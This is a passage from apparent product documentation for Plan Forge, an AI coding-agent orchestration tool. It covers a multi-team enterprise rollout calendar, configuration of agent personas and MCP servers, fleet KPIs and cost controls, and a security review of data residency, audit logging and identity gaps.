| LLM provider outage | OTel error rate spike on gen_ai.* spans | Plan Forge supports multi-provider routing in .forge.json. Failover order configurable per slice |
| AOAI quota exhausted mid-slice | Worker error, gate failure | Preflight quota check (planned), slice retry with backoff, cross-region failover via deployment alias |
| GitHub Actions runner exhaustion | Workflow queue depth, Cloud Agent session pending | Self-hosted runner pool, prioritize critical plans via [P] tag and runner labels |
| Plan drift (PR diverges from approved plan) | pforge diff post-execution | Pre-merge gate fails; reviewer-gate agent flags; review thread opened via forge_review_add |
| Cost runaway (slice loops or model misroutes) | forge_cost_report anomaly, dashboard cost-tile alert | Per-slice workerTimeoutMs cap, forge_alert_triage priority queue, in-loop stuck detector (planned) |
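Two of the mitigations in the table, retry with backoff and ordered provider failover, follow a common pattern that can be sketched generically. The code below is illustrative only and does not reflect Plan Forge internals: ProviderError, call_with_failover, and the provider callables are hypothetical names.

```python
import time
from typing import Callable, Sequence


class ProviderError(Exception):
    """Raised by a provider callable when a request fails (hypothetical)."""


def call_with_failover(
    providers: Sequence[tuple[str, Callable[[str], str]]],
    prompt: str,
    retries_per_provider: int = 2,
    base_delay_s: float = 0.5,
    sleep: Callable[[float], None] = time.sleep,
) -> tuple[str, str]:
    """Try each provider in order; retry with exponential backoff before moving on."""
    last_error = None
    for name, send in providers:
        for attempt in range(retries_per_provider):
            try:
                return name, send(prompt)
            except ProviderError as exc:
                last_error = exc
                sleep(base_delay_s * (2 ** attempt))
    raise RuntimeError("all providers failed") from last_error


# Usage with two stand-in providers: the first always fails, the second works.
def flaky(_prompt: str) -> str:
    raise ProviderError("quota exhausted")


def healthy(prompt: str) -> str:
    return f"ok: {prompt}"


delays = []  # record backoff delays instead of actually sleeping
result = call_with_failover(
    [("primary", flaky), ("secondary", healthy)], "slice 1", sleep=delays.append
)
print(result)  # ('secondary', 'ok: slice 1')
print(delays)  # [0.5, 1.0]
```

Injecting the sleep function keeps the sketch testable without real delays. A production version would also want jitter and a cap on total wait time.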
For an enterprise rolling out across 5 teams in 90 days:
| Week | Milestone |
|---|---|
| 0 | Stakeholder alignment, pick LLM provider strategy, identify pilot team |
| 1–2 | Pilot team installs Plan Forge, runs first plan against a known-easy feature, baseline cost + cycle time |
| 3–4 | Pilot team runs 5+ plans, refines instruction files, captures lessons |
| 5–6 | Add team 2 + team 3 in parallel; first multi-team observability dashboards |
| 7–8 | Add teams 4 + 5; introduce shared MCP server (Foundry Toolbox or in-house equivalent) |
| 9–10 | Org-wide rollout patterns formalized; cost guardrails; quality KPIs reported up |
| 11–12 | First quarterly review; eval data informs next-quarter planning |
See Appendix M — Fleet Operator Playbook for week-by-week specifics.

Get a fleet of specialized agents productive on Day 1, not Day 90. A repeatable 7-step recipe.
Audience: Platform leads onboarding 12+ "Virtual Squad" agent personas across product teams in the first weeks of a Plan Forge rollout.
Goal: One work day for the first squad, one hour per additional squad thereafter.
Plan Forge ships 19 agent personas out of the box (6 stack-specific + 7 cross-stack + 5 pipeline + 1 audit-classifier). Each is a Markdown file under .github/agents/ with a YAML frontmatter description and a body that defines the persona's expertise, tone, and lane. Agents are invoked from chat (agent picker dropdown) or referenced from a plan slice (agent: security-reviewer). They cannot edit files; they audit and report.
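As a rough illustration of the persona file layout described above, the sketch below pulls the description field out of a leading frontmatter block. It handles only a single-line description value and is not a YAML parser; the sample file contents and the read_frontmatter_description helper are hypothetical.

```python
def read_frontmatter_description(markdown_text: str):
    """Return the `description` value from a leading frontmatter block, or None."""
    lines = markdown_text.splitlines()
    if not lines or lines[0].strip() != "---":
        return None
    for line in lines[1:]:
        if line.strip() == "---":  # end of frontmatter
            break
        key, sep, value = line.partition(":")
        if sep and key.strip() == "description":
            return value.strip().strip("'\"")
    return None


# Hypothetical persona file contents, for illustration only.
sample = """---
description: Reviews input validation, secret handling, and auth
---
You are a security reviewer. Audit and report; do not edit files.
"""

print(read_frontmatter_description(sample))
```

For anything beyond a quick inventory of personas, a real YAML library is the safer choice, since frontmatter values can span lines or contain quoted colons.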
The "Agent Factory" is the configuration plus convention layer that makes those 19 personas productive against a customer's specific stack on Day 1, instead of generic-but-vague.
1. SUBSTRATE: confirm GitHub-native primitives are in place
2. CONFIGURE: write project profile + project principles (one hour each)
3. ROUTE: assign agents to lanes (which agents own which kinds of work)
4. SHARED CONTEXT: populate AGENTS.md, copilot-instructions.md, instruction files
5. SHARED TOOLS: point at MCP servers (Plan Forge MCP, github-mcp-server, optional Foundry Toolbox)
6. PILOT: run one real plan with the full agent fleet, capture friction
7. ITERATE: encode lessons in instruction files; re-run
Each step below is one to two hours for a platform lead familiar with the codebase. The whole recipe is achievable in one work day for the first squad and replicates in one hour per additional squad thereafter.
Verify the GitHub-native primitives Plan Forge depends on are enabled in the org:
| Primitive | Check | If missing |
|---|---|---|
| GitHub Copilot Enterprise | Org admin → Copilot tab → "Copilot Enterprise" enabled | Provision before continuing |
| Copilot Cloud Agent | Org admin → Copilot tab → Cloud Agent toggle ON for target repos (or via custom properties) | Enable per GitHub docs |
| GitHub Actions enabled per repo | Repo settings → Actions → "Allow all actions" or specific allowlist | Enable per repo |
| MCP support in IDE | VS Code 1.95+ with chat.mcp.enabled setting on, or Copilot CLI 1.x | Update IDE / install CLI |
| AGENTS.md aware tooling | At least one of: Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf | Pick at least one, they're Plan Forge's worker options for non-CCA paths |
If any are missing, fix before moving on. The factory recipe assumes the substrate is in place.
Plan Forge ships two prompts that, run once, produce the configuration that downstream agents inherit:
project-profile.prompt.md: what your stack is
A guided interview that produces .github/instructions/project-profile.instructions.md. Captures:
This file auto-loads (via applyTo: '**' in frontmatter) for every agent session in the repo. Run it once per repo. It's the foundation everything else assumes.
project-principles.prompt.md: what your team commits to
A second interview that produces docs/plans/PROJECT-PRINCIPLES.md plus a companion .github/instructions/project-principles.instructions.md. Captures:
This file is loaded by the SessionStart hook and pinned in agent context for the duration of every session.
Profile = facts about the stack. Principles = commitments about how the team works. Confusing the two is a common mistake. Profile is descriptive; principles is prescriptive. Both feed every agent every session.
Plan Forge ships these 19 personas. Decide who owns what for your team:
| Agent | Owns |
|---|---|
| architecture-reviewer | Layer separation, pattern adherence, refactor proposals |
| database-reviewer | Schema, migrations, query performance, ORM patterns |
| deploy-reviewer | Dockerfiles, CI/CD config, deployment scripts |
| performance-reviewer | Hot/cold path analysis, allocation, profiling |
| security-reviewer | Input validation, secret handling, OWASP, auth |
| test-runner | Test coverage, test quality, fixture sanity |
| Agent | Owns |
|---|---|
| api-contracts-reviewer | OpenAPI consistency, breaking change detection |
| accessibility-reviewer | WCAG, ARIA, keyboard navigation |
| multi-tenancy-reviewer | Tenant isolation, row-level security, cross-tenant query risk |
| ci-cd-reviewer | Pipeline correctness, runner sanity, gate completeness |
| observability-reviewer | Trace coverage, log quality, metric meaningfulness |
| dependency-reviewer | Vulnerability scanning, license compliance, version hygiene |
| compliance-reviewer | GDPR / CCPA / SOC2 / HIPAA / PCI-DSS conformance |
| Agent | Stage |
|---|---|
| specifier | Step 0: define what & why |
| plan-hardener | Step 2: harden plan into execution contract |
| executor | Step 3: execute slices with validation gates |
| reviewer-gate | Step 5: independent review and drift detection |
| shipper | Step 6: commit, deploy, close |
Step 1 (preflight) ships as a prompt, not an agent; see .github/prompts/step1-preflight-check.prompt.md. It runs inline rather than as a separate persona.
| Agent | Role |
|---|---|
| audit-classifier-reviewer | Reviews changes to the audit classifier itself; enforces before/after finding counts |
For each agent, pick:
Document the routing in .github/agents/ROUTING.md. You may need to create this file: it is not yet a Plan Forge default, but the convention is clean and we recommend adopting it.
Plan Forge generates these on setup.ps1 / setup.sh. The factory step is to populate them with project-specific content beyond the templated defaults.
AGENTS.md (repo root)
The Linux Foundation-stewarded standard read by Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf, and others. Contents:
Plan Forge keeps this in sync with the project-profile output, but review the generated content: generic phrasing here costs you on every agent run.
.github/copilot-instructions.md
The GitHub-native equivalent. Contains:
Plan Forge generates a strong default. Customize the "Project Overview" section with your team's specifics.
.github/instructions/*.instructions.md
Plan Forge ships 18 of these per preset (the dotnet/typescript/python/etc. preset directories under presets/, each with its own .github/instructions/). Each has an applyTo glob that controls when it auto-loads:
| File | Loads on |
|---|---|
| architecture-principles.instructions.md | ** (always, universal baseline) |
| project-profile.instructions.md | ** (always, your stack) |
| project-principles.instructions.md | ** if PROJECT-PRINCIPLES.md exists |
| git-workflow.instructions.md | ** |
| api-patterns.instructions.md | ** |
| auth.instructions.md | ** |
| database.instructions.md | ** |
| security.instructions.md | ** |
| testing.instructions.md | ** |
| errorhandling.instructions.md | ** |
| deploy.instructions.md | ** |
| observability.instructions.md | ** |
| caching.instructions.md | ** |
| messaging.instructions.md | ** |
| multi-environment.instructions.md | ** |
| performance.instructions.md | ** |
| version.instructions.md | ** |
| status-reporting.instructions.md | docs/plans/**, pforge-mcp/**, .forge/** |
| context-fuel.instructions.md | ** |
| self-repair-reporting.instructions.md | ** |
These are templated. Read each one. Add team-specific guidance where the template is generic.
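The effect of the applyTo globs in the table can be approximated with a few lines of Python. This is a sketch under stated assumptions: the actual matching is done by the editor or agent host, whose glob semantics may differ from Python's fnmatch, and the files_loaded_for helper is hypothetical. Only three table rows are included for brevity.

```python
from fnmatch import fnmatchcase

# applyTo patterns copied from a subset of the table above.
APPLY_TO = {
    "architecture-principles.instructions.md": ["**"],
    "testing.instructions.md": ["**"],
    "status-reporting.instructions.md": ["docs/plans/**", "pforge-mcp/**", ".forge/**"],
}


def files_loaded_for(path: str) -> list[str]:
    """Return the instruction files whose applyTo patterns match `path`."""
    return sorted(
        name
        for name, patterns in APPLY_TO.items()
        if any(fnmatchcase(path, pattern) for pattern in patterns)
    )


print(files_loaded_for("src/api/orders.ts"))
print(files_loaded_for("docs/plans/Phase-28-PLAN.md"))
```

The first call returns only the two always-on files; the second also picks up status-reporting.instructions.md because the path falls under docs/plans/. A narrower applyTo is what keeps a specialized instruction file out of unrelated sessions.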
Configure .vscode/mcp.json (Plan Forge generates this; you augment) with the MCP servers the fleet should share:
{
  "mcpServers": {
    "plan-forge": {
      "command": "node",
      "args": ["./pforge-mcp/server.mjs"]
    }
  }
}
{
  "github": {
    "url": "https://api.githubcopilot.com/mcp/",
    "auth": "oauth"
  }
}
The github-mcp-server gives every agent in the fleet first-class access to GitHub Issues, PRs, repos, code-scanning alerts, and 19 other toolsets. 29.5k stars, MIT, official.
{
  "foundry-toolbox": {
    "url": "https://YOUR-FOUNDRY-TOOLBOX-ENDPOINT/mcp",
    "auth": {
      "type": "bearer",
      "tokenSource": "azure-keyvault://your-vault/foundry-toolbox-pat"
    }
  }
}
Foundry Toolboxes are MCP-compatible endpoints that bundle Web Search, Code Interpreter, File Search, Azure AI Search, OpenAPI tools, and Agent-to-Agent connections behind a single endpoint with versioning, auth, and policy enforcement. Single source of truth for the org's tools, consumed identically by Plan Forge agents in worker sessions and by Foundry agents in production.
{
  "azure-devops": {
    "url": "https://YOUR-FOUNDRY-CATALOG/mcp/azuredevops",
    "auth": "oauth"
  }
}
Microsoft ships an Azure DevOps MCP Server (preview) as a Foundry catalog entry.
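The server fragments above are shown separately; one way to combine them into a single config is sketched below. It assumes each fragment's entries sit alongside plan-forge under the mcpServers key, which is an inference from the first example rather than something the manual states. The add_servers helper is hypothetical.

```python
import json

# Base config and one fragment, copied from the examples above.
base = {
    "mcpServers": {
        "plan-forge": {"command": "node", "args": ["./pforge-mcp/server.mjs"]}
    }
}

github_fragment = {
    "github": {"url": "https://api.githubcopilot.com/mcp/", "auth": "oauth"}
}


def add_servers(config: dict, fragment: dict) -> dict:
    """Return a copy of `config` with the fragment's servers added under mcpServers."""
    merged = json.loads(json.dumps(config))  # cheap deep copy for JSON-only data
    servers = merged.setdefault("mcpServers", {})
    for name, entry in fragment.items():
        if name in servers:
            raise ValueError(f"server {name!r} is already configured")
        servers[name] = entry
    return merged


combined = add_servers(base, github_fragment)
print(json.dumps(combined, indent=2))
```

Refusing to overwrite an existing entry is a deliberate choice here: a silent overwrite of the plan-forge entry would break every agent in the fleet at once.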
Pick a real, small feature for the pilot. Not a toy. Not a refactor. A tangible feature with a clear acceptance criterion.
Run the full pipeline:
step0-specify-feature.prompt.md: define what & why
step1-preflight-check.prompt.md: verify prerequisites
step2-harden-plan.prompt.md: harden the plan into an execution contract
pforge run-plan --estimate <plan>: see projected cost under each quorum mode
pforge run-plan <plan>: execute (or --assisted for human-in-the-loop)
step5-review-gate.prompt.md: independent review
Watch for:
pforge diff should be clean. If it's not, the plan was too vague.
Every Plan Forge project should be doing this constantly:
The factory's value compounds. The first plan teaches you 5 things. The fifth plan teaches you 1. By the tenth plan, the agents are productive against your specific codebase, not generic.
After the first squad is productive, replicate to additional teams:
For a 5-team / 1000-dev rollout, the factory typically takes:
| Mistake | Symptom | Fix |
|---|---|---|
| Generic project profile | Agents give generic advice; reviewers ignore them | Re-run project-profile.prompt.md with thoughtful answers, not defaults |
| No project principles | Agents drift outside scope; PRs widen unexpectedly | Run project-principles.prompt.md; document forbidden patterns explicitly |
| Default agent routing | Reviewers fire on irrelevant changes; humans tune them out | Document routing in .github/agents/ROUTING.md per team |
| Skip AGENTS.md customization | AGENTS.md-aware agents (Cursor, Claude Code) give weak suggestions | Read the generated AGENTS.md; add team-specific build/test/style content |
| One MCP server forever | Agents lack access to org-specific tools; humans bridge manually | Add Foundry Toolbox or in-house MCP servers as fleet matures |
| First plan is a toy | Lessons don't scale to real work | Pilot a real, small feature, never a hello-world |
| No iteration loop | Same friction in plan 2, plan 3, plan 4 | After every plan, ask "what would make plan N+1 better?", encode the answer in instruction files |
After 30 days with the factory in place:
pforge diff clean ≥ 80% of the time
These are real numbers from dogfooding. They scale linearly with the discipline applied to the factory configuration.

A calendar, not a feature list. Day 1 / Week 4 / Week 12 milestones with concrete go/no-go criteria for operating Plan Forge across multiple product teams.
Audience: Platform leads operating Plan Forge across multiple product teams.
How to use: Each phase has a goal, activities, go/no-go criteria, and anti-patterns. If you're following it strictly and something feels off, that's a signal worth investigating, not a step to skip.
Before you begin:
If any of these aren't true, work on them first. Plan Forge accelerates teams that already have direction; it doesn't substitute for it.
Pilot team has Plan Forge installed, has run one plan end-to-end against a real (small) feature, and has a baseline measurement of cycle time and cost.
- git clone https://github.com/srnichols/plan-forge
- setup.ps1 (Windows) or setup.sh (Mac/Linux) in target project
- pforge smith returns clean
- project-profile.prompt.md once for the pilot repo
- project-principles.prompt.md once
- AGENTS.md and .github/copilot-instructions.md
- .vscode/mcp.json with Plan Forge MCP server + github-mcp-server (and Foundry Toolbox if applicable)
- step0 through step5 of the pipeline
- pforge run-plan --estimate <plan> first to see projected cost
- pforge run-plan --assisted <plan> for human-in-the-loop the first time
- pforge diff
- .forge/baseline-2026-05-06.json or your team's metrics store
| Signal | Pass | Fail |
|---|---|---|
| First plan ran end-to-end | Yes | Stop, debug |
| pforge diff clean post-merge | Yes (drift score ≥ 80) | Plan was too vague; re-harden |
| Cost within 50% of estimate | Yes | Either pricing data is stale or workload differs from typical, investigate |
| Pilot team's reaction | "Useful, with caveats" | "Confusing" or "in the way", review configuration |
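The three measurable Day 1 signals can be checked mechanically once the numbers are in hand. A minimal sketch, assuming you supply the inputs yourself: day1_go_no_go and its parameters are hypothetical names, not part of the pforge CLI, and "within 50% of estimate" is read here as an absolute deviation from the estimate.

```python
def day1_go_no_go(ran_end_to_end, drift_score, estimated_cost, actual_cost):
    """Return (passed, reasons) for the measurable Day 1 signals."""
    reasons = []
    if not ran_end_to_end:
        reasons.append("first plan did not run end-to-end: stop and debug")
    if drift_score < 80:
        reasons.append("drift score below 80: plan too vague, re-harden")
    # Assumption: "within 50%" means |actual - estimate| <= 0.5 * estimate.
    if abs(actual_cost - estimated_cost) > 0.5 * estimated_cost:
        reasons.append("cost off by more than 50%: check pricing data and workload")
    return (not reasons, reasons)
```

The fourth signal, the pilot team's reaction, is qualitative and stays a conversation rather than a check.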
- --assisted first time, first plan should be observable
Pilot team runs 5+ plans, friction patterns become visible, instruction files start to encode lessons.
- .github/instructions/* as a result
| Signal | Pass | Fail |
|---|---|---|
| ≥ 5 plans completed | Yes | Slow uptake, investigate barriers (often: fear of cost, unclear when to use vs not) |
| Drift score average ≥ 70 | Yes | Plan-hardener prompt needs project-specific tuning |
| Instruction files updated ≥ 3 times | Yes | Team isn't iterating, that's the value loop, must enable it |
| Cost-per-PR trending down or stable | Yes | Cost going up plan-over-plan suggests waste, investigate slice sizing |
Pilot team is self-sufficient. Second team starts, with patterns from Pilot 1 captured as templates. First multi-team observability dashboards live.
- AGENTS.md style and .github/instructions/* (forks where stack differs)
- .github/agents/ROUTING.md
- --assisted mode
- localhost:3100 shows per-developer; the OTel backend shows org-wide
| Signal | Pass | Fail |
|---|---|---|
| Pilot team self-sufficient | Yes | Means platform team is still bottleneck, extract patterns into docs |
| Team 2 ran first plan within 1 day of onboarding | Yes | Onboarding pattern needs simplification |
| Multi-team dashboards reflect real data | Yes | OTel pipeline issue, fix before adding more teams |
| Cost per merged PR vs. baseline | Trending down or stable | If up, investigate model routing and slice sizing |
4 of 5 teams active. Shared MCP server (Foundry Toolbox or in-house) deployed. Reviewer agents are catching real issues at PR time.
- .vscode/mcp.json to consume
- .forge.json
- forge_alert_triage
- pforge diff clean)
| Signal | Pass | Fail |
|---|---|---|
| 4 teams active and self-sufficient | Yes | Onboarding pattern still has friction; investigate |
| Shared MCP server reduces per-team config drift | Yes | Adoption needs nudging, show concrete value |
| Reviewer-agent comments acted on ≥ 30% of the time | Yes | Personas need tuning, or routing is wrong |
| Cost guardrails preventing runaway | Yes | Budgets ineffective, likely too high or unenforced |
All 5 teams active. First quarterly review of fleet metrics. Plan for next quarter.
- forge_health_trend aggregates the quarter's data
- /memories/repo/) captures the institutional learning
- forge_meta_bug_file)
| Signal | Pass | Fail |
|---|---|---|
| All 5 teams operating without daily platform support | Yes | Fleet is too dependent, invest in self-service |
| Cost per merged PR is below baseline | Yes | Diminishing returns, investigate where time is going |
| Quarterly KPIs trending right direction | Yes | Hypothesis was wrong somewhere, adjust |
| Engineering leadership confident in scale-out to next 5 teams | Yes | Trust gap, surface what's missing |
The metrics that matter at the fleet level:
| KPI | Source | Healthy range |
|---|---|---|
| Cycle time (spec → merged PR) | OTel + git history | 30–70% of pre-Plan-Forge baseline |
| Cost per merged PR | forge_cost_report | Stable or declining month-over-month |
| Plan adherence (drift score) | forge_diff per plan | ≥ 80% of plans clean |
| Gate failure rate | forge_health_trend | < 30%; failures should drive instruction updates |
| Regressions caught at gate vs. production | Bug registry + OTel | Ratio improving over time |
| Reviewer-agent acceptance rate | Manual sampling | ≥ 30% of comments acted on |
| Plan Forge plans / total PRs | forge_health_trend | Grows over time toward team comfort level |
| Per-engineer cost (when implemented) | Cost service (planned) | Outliers investigated, not punished |
| Time-to-green per slice | OTel + slice events | Stable or improving |
Three habits that make cost predictable:
- pforge run-plan --estimate <plan> shows projected cost across all four quorum modes (auto, power, speed, false). Look at the numbers before the spend.
- power (Opus + GPT-5 + Grok consensus, threshold 5) is for high-stakes architectural slices. speed (cheaper models, threshold 7) is for high-volume routine work. auto makes a per-slice judgment. false is single-model. Use them deliberately.
Today, Plan Forge tracks cost per plan, per slice, per model. Per-engineer attribution is on the roadmap (planned); until then, the workaround is:
- .forge/cost-history.json is their own ledger
- service.namespace, service.instance.id)
For finance teams that need formal chargeback, the OTel data is the source of truth, not the dashboard.
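Team-level attribution from exported telemetry can be as simple as a group-by on the OTel resource attribute service.namespace. A rough sketch, assuming each exported record is a flat dict: the cost_usd field name and the record shape are hypothetical, since the export schema is not specified here.

```python
from collections import defaultdict

def cost_by_namespace(records):
    """Sum cost per service.namespace; records without one are 'unattributed'."""
    totals = defaultdict(float)
    for rec in records:
        team = rec.get("service.namespace", "unattributed")
        # Assumption: cost arrives as a number under the hypothetical key cost_usd.
        totals[team] += float(rec.get("cost_usd", 0.0))
    return {team: round(total, 2) for team, total in totals.items()}
```

Keeping an explicit "unattributed" bucket makes missing resource attributes visible instead of silently dropping spend.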
Two patterns work; pick one and stick with it:
Pros: teams move at their own pace, instruction files reflect team culture, no central bottleneck.
Cons: harder to enforce org-wide patterns.
- .github-private/ template repo
Pros: consistency across teams, easier compliance posture.
Cons: bottlenecks if platform team is small; teams may resent loss of autonomy.
The right answer depends on your engineering culture. Federated works for cultures that value team autonomy; centralized works for cultures that value consistency.
Plan Forge is software. Software has bugs. The escalation path:
- forge_meta_bug_file when they encounter a defect during execution. The tool routes to the Plan Forge GitHub repo with a stable hash to deduplicate
- srnichols/plan-forge for non-emergency defects
- package.json if a recent release introduced the defect; rollback is one npm install away
Plan Forge is open source. There is no commercial support tier today. The escalation model is community + your own platform team's competence.
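Deduplicating defect reports depends on a hash that stays the same when the same failure is reported twice with different incidental details. How forge_meta_bug_file computes its hash is not documented here; the sketch below is one plausible approach, with a hypothetical function name and normalization rules.

```python
import hashlib
import re

def defect_fingerprint(tool, error_message):
    """Hash a defect so repeat reports of the same failure collide."""
    # Collapse volatile details (hex ids, numbers, extra whitespace) before hashing.
    normalized = re.sub(r"0x[0-9a-f]+|\d+", "N", error_message.lower())
    normalized = re.sub(r"\s+", " ", normalized).strip()
    digest = hashlib.sha256(f"{tool}|{normalized}".encode("utf-8")).hexdigest()
    return digest[:16]
```

Two timeouts that differ only in duration or slice number produce the same fingerprint, while the same message from a different tool does not.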
| Mistake | Symptom | Fix |
|---|---|---|
| Adding teams faster than the fleet can absorb | Inconsistent quality, cost surprises, frustrated devs | One team at a time until self-sufficient; don't compress for OKR optics |
| Skipping the iteration loop | Same friction in plan 50 as in plan 5 | Mandate post-plan retro; encode lessons in instructions |
| Treating Plan Forge as "set it and forget it" | Quality degrades; agents feel stale | It's a living configuration; budget time monthly to maintain |
| Reviewer agents fire on everything | Humans tune them out; signal lost | Tune routing per team; advisory ≠ blocking ≠ escalation |
| Cost reports go unread | Surprises at month-end | Daily cost dashboard for first month, weekly thereafter |
| No on-call for fleet-level Plan Forge issues | One engineer is the SPOF | Document operations model; rotate ownership |
| Eval data ignored | Trajectories accumulate; learning doesn't compound | Review trajectories quarterly; promote useful patterns |

Where data lives, what's logged, how to export for audit, identity (today and roadmap), and the air-gapped / Azure Government deployment paths.
Audience: Security architects, compliance officers, and platform leads conducting a security review of Plan Forge.
Scope: Where data lives, what's logged, how to export for audit, identity model (today and roadmap), and the air-gapped / Azure Government deployment paths.
Plan Forge is local-first. The orchestrator runs on the developer's machine or a CI runner inside the customer's network. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM (and even then, all logging stays local). The audit trail is structured, complete, and exportable. Identity is currently bearer-token only and is the largest gap on the roadmap.
| Concern | Status |
|---|---|
| Source code leaves network | Only when customer-configured LLM provider is hosted; all logging stays local |
| Audit log of agent actions | Structured, complete, production-grade today (telemetry.mjs, EVENTS.md) |
| Audit log export | OTel exporter on roadmap (Week 2 of enterprise hardening); manual export available today |
| Identity / SSO | Bearer token only today; Entra ID / SAML / SCIM on roadmap |
| RBAC | None today; on roadmap |
| Data residency controls | Customer chooses LLM provider region; Plan Forge respects |
| Air-gapped deployment | Architecturally supported; documentation gap (this doc) |
| Encryption at rest | Customer's filesystem encryption (Plan Forge respects) |
| Secret redaction | Built-in for testbed findings; configurable scope on roadmap |
| FedRAMP / IL5 / IL6 / HIPAA / PCI / SOC2 | Plan Forge is OSS; compliance posture attaches to the customer's deployment, not to a Plan Forge certification |
Five concrete data movements. For each, who handles the data and where it goes.
Stays in the customer's network, except for:
If you use only on-prem inference (Foundry Local, Ollama, vLLM, llama.cpp, etc.), source code never leaves your network for any reason.
Stay in the customer's repo. Plan files (docs/plans/*.md) are committed to git. They live wherever the repo lives.
.forge/ artifacts
Stay on the local filesystem (developer machine or CI runner). Includes:
- .forge/runs/<id>/: per-run trajectory, events, slice artifacts, summary, traces, cost history
- .forge/cost-history.json: aggregate cost
- .forge/telemetry/tool-calls.jsonl: MCP tool invocations
- .forge/liveguard-events.jsonl: LiveGuard scan events
- .forge/trajectories/<plan-slug>.jsonl: Copilot Coding Agent trajectories (when CCA is the worker)
- .forge/fm-sessions/*.jsonl: Forge-Master conversation sessions
.forge/ is gitignored by default. It can be committed for audit purposes if your security policy requires it.
Three tiers, three different residency stories:
| Tier | Location | Lifetime | Notes |
|---|---|---|---|
| L1 (volatile hub) | In-process RAM | Per-process | Bounded ring buffer, evicted on restart |
| L2 (structured) | Local filesystem (.forge/, .github/, docs/plans/) | Persistent | Survives restart; lives where the repo lives |
| L3 (semantic via OpenBrain) | External Postgres + pgvector (optional) | Forever | Cross-project by design. If used, deploy the Postgres in your network |
If L3/OpenBrain is not configured, Plan Forge runs single-project, single-session memory only. No external service required.
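The L1 tier's behaviour (bounded, in-process, gone on restart) is what a fixed-size ring buffer gives you. A minimal sketch of that idea, assuming nothing about the actual hub implementation; the class name VolatileHub is hypothetical.

```python
from collections import deque

class VolatileHub:
    """In-process event buffer that keeps only the most recent `capacity` events."""

    def __init__(self, capacity):
        # deque(maxlen=...) drops the oldest entry automatically when full.
        self._events = deque(maxlen=capacity)

    def publish(self, event):
        self._events.append(event)

    def recent(self):
        return list(self._events)
```

Because the buffer lives only in process memory, anything that must survive a restart belongs in L2 on the filesystem.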
By default, telemetry stays local in .forge/telemetry/. With the OTel exporter (Week 2 of enterprise hardening), traces and metrics are emitted in the OpenTelemetry gen_ai.* semantic-convention format to a customer-chosen OTLP endpoint. Common targets:
The OTel exporter is off by default. Enable by setting OTEL_EXPORTER_OTLP_ENDPOINT.
Plan Forge emits structured events for 38 event types across eight families. The full ebook reference (envelope, enums, payloads, retention) is Appendix V · Event Catalog; the canonical JSON schema lives in pforge-mcp/EVENTS.md. Categories include:
- run-started, slice-started, slice-completed, run-completed)
- quorum-started, quorum-model-replied, quorum-synthesized)
- drift-, incident-, secret-scan-, dep-watch-)
Each event carries:
| Sink | Format | Retention |
|---|---|---|
| .forge/runs/<id>/events.log | NDJSON | Per-run, kept until manual cleanup |
| .forge/runs/<id>/trace.json | OTLP-compatible | Per-run |
| .forge/telemetry/tool-calls.jsonl | NDJSON, append-only | Persistent |
| .forge/liveguard-events.jsonl | NDJSON, append-only | Persistent |
| Hub event stream | In-memory + WebSocket | Volatile (last N events) |
Today (manual):
# Aggregate all events from a date range
jq -s 'sort_by(.ts)' .forge/runs/*/events.log > audit-export.json
# Or use forge_search for filtered export
pforge search --since 2026-04-01 --sources run,liveguard,bug --output audit.json
Roadmap (Week 2 of enterprise hardening): pforge audit export --since <date> --format <json|csv> as a first-class CLI.
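Until that CLI exists, the jq aggregation above can also be done in Python when the export needs filtering. A sketch under two assumptions: every event line is a JSON object with a ts field (as the jq command implies), and ts is an ISO-8601 string so that string comparison orders events chronologically. The since parameter is an illustrative addition.

```python
import glob
import json

def collect_events(pattern=".forge/runs/*/events.log", since=None):
    """Merge NDJSON event logs into one list sorted by the `ts` field."""
    events = []
    for path in sorted(glob.glob(pattern)):
        with open(path, encoding="utf-8") as handle:
            for line in handle:
                line = line.strip()
                if not line:
                    continue  # tolerate blank lines between records
                event = json.loads(line)
                # Assumption: ISO-8601 timestamps compare correctly as strings.
                if since is None or event["ts"] >= since:
                    events.append(event)
    return sorted(events, key=lambda event: event["ts"])
```

Writing the result with json.dump produces the same kind of single-file export as the jq one-liner.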
Built-in for testbed findings (defect-log.mjs). High-entropy secret detection in diffs (forge_secret_scan) always redacts values; findings are masked before caching or display. Formalizing this as a configurable scope is planned for Week 3 (auth/RBAC scaffolding).
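High-entropy detection generally means measuring how random a token looks and masking anything above a cutoff. The sketch below illustrates the technique with Shannon entropy; it is not the forge_secret_scan implementation, and the function names, the 20-character minimum, and the 4.0-bit threshold are assumptions chosen for illustration.

```python
import math
import re
from collections import Counter

def shannon_entropy(text):
    """Bits of entropy per character of a non-empty string."""
    counts = Counter(text)
    return -sum((n / len(text)) * math.log2(n / len(text)) for n in counts.values())

def redact_high_entropy(line, min_length=20, threshold=4.0):
    """Mask long, random-looking tokens; leave ordinary text untouched."""
    def mask(match):
        token = match.group(0)
        return "[REDACTED]" if shannon_entropy(token) >= threshold else token
    # Only tokens of at least min_length characters are candidates.
    return re.sub(r"[A-Za-z0-9+/_\-]{%d,}" % min_length, mask, line)
```

Masking before the value is cached or displayed, as the text above describes, means the raw secret never reaches a log or a dashboard.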
Plan Forge supports:
- bridge.approvalSecret in .forge.json)
- .forge/secrets.json for LLM providers (OpenAI, Anthropic, xAI, GitHub Copilot, Azure OpenAI when manually configured)
Known secrets recognized:
- GITHUB_TOKEN
- XAI_API_KEY
- OPENAI_API_KEY
- ANTHROPIC_API_KEY
- OPENCLAW_API_KEY
Not yet supported as first-class:
- AZURE_OPENAI_API_KEY + endpoint URL (works manually; first-class config on roadmap)
Order of priority based on enterprise requests:
- AZURE_OPENAI_API_KEY and endpoint as recognized secrets, deployment-name vs model-name handled in config, Entra ID auth via azure-identity SDK
If your security review requires SSO/SCIM/RBAC today, Plan Forge is not a fit. The honest answer matters more than overpromising.
Plan Forge is open-source software (MIT license). Compliance certifications (FedRAMP, IL5/IL6, HIPAA, PCI-DSS, SOC2) attach to the customer's deployment of Plan Forge, not to Plan Forge itself. There is no Plan Forge SaaS to certify.
Even so, several Plan Forge architectural choices are friendly to compliance audits:
| Posture | What helps |
|---|---|
| No SaaS data plane | Nothing to subpoena from a vendor; data lives where you put it |
| Structured audit trail | Every action logged with timestamps, correlation IDs, severity |
| Open source | Auditable end-to-end; no proprietary closed binaries |
| Local-first by default | Air-gapped deployment is structurally possible (see below) |
| Open standards | AGENTS.md, MCP, OTel gen_ai.*, no proprietary lock-in to challenge |
